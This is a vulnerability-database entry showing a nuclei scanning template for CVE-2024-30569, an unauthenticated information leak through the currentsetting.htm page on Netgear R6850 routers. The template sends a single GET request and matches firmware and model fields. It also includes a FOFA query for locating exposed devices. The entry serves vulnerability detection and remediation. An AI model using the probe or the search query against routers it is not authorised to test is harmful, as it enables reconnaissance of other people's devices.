Lucene search
K

Netgear R6850 - Information Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Netgear R6850 router has an info leakage vulnerability allowing access to sensitive data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-30569
26 Mar 202512:40
circl
CNNVD
Netgear R6850 安全漏洞
3 Apr 202400:00
cnnvd
CNVD
Netgear R6850 currentsetting.htm file information disclosure vulnerability
10 Apr 202400:00
cnvd
CVE
CVE-2024-30569
3 Apr 202400:00
cve
Cvelist
CVE-2024-30569
3 Apr 202400:00
cvelist
NVD
CVE-2024-30569
3 Apr 202413:16
nvd
OSV
CVE-2024-30569
3 Apr 202413:16
osv
Positive Technologies
PT-2024-23496 · NetGear · Netgear R6850
3 Apr 202400:00
ptsecurity
RedhatCVE
CVE-2024-30569
23 May 202509:17
redhatcve
Vulnrichment
CVE-2024-30569
3 Apr 202400:00
vulnrichment
Rows per page
id: CVE-2024-30569

info:
  name: Netgear R6850 - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the currentsetting.htm page.This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as firmware version, model details, connection status, and other system configuration data.
  impact: |
    Attackers can access sensitive system information from the Netgear R6850 router.
  remediation: |
    Update Netgear R6850 firmware to a version that patches the information disclosure vulnerability.
  reference:
    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Info%20Leak%20in%20Netgear-R6850%EF%BC%88currentsetting.htm%EF%BC%89.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30569
    - https://www.netgear.com/about/security/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-30569
    cwe-id: CWE-200
    epss-score: 0.01923
    epss-percentile: 0.77465
    cpe: cpe:2.3:o:netgear:r6850_firmware:1.1.0.88:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: netgear
    product: r6850_firmware
    fofa-query: app="NETGEAR" && "R6850"
  tags: cve,cve2024,netgear,router,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/currentsetting.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Firmware="
          - "LoginMethod="
          - "Model="
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207dae6e515699c4ef0dd91fdc58e217938f1606a313b1e7e7b07358fb6c29908b022100e0b3a503111e99a163c5b33322aac721b0e21b3d0482eb9fc8c192b13048b68b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.01923
SSVC
23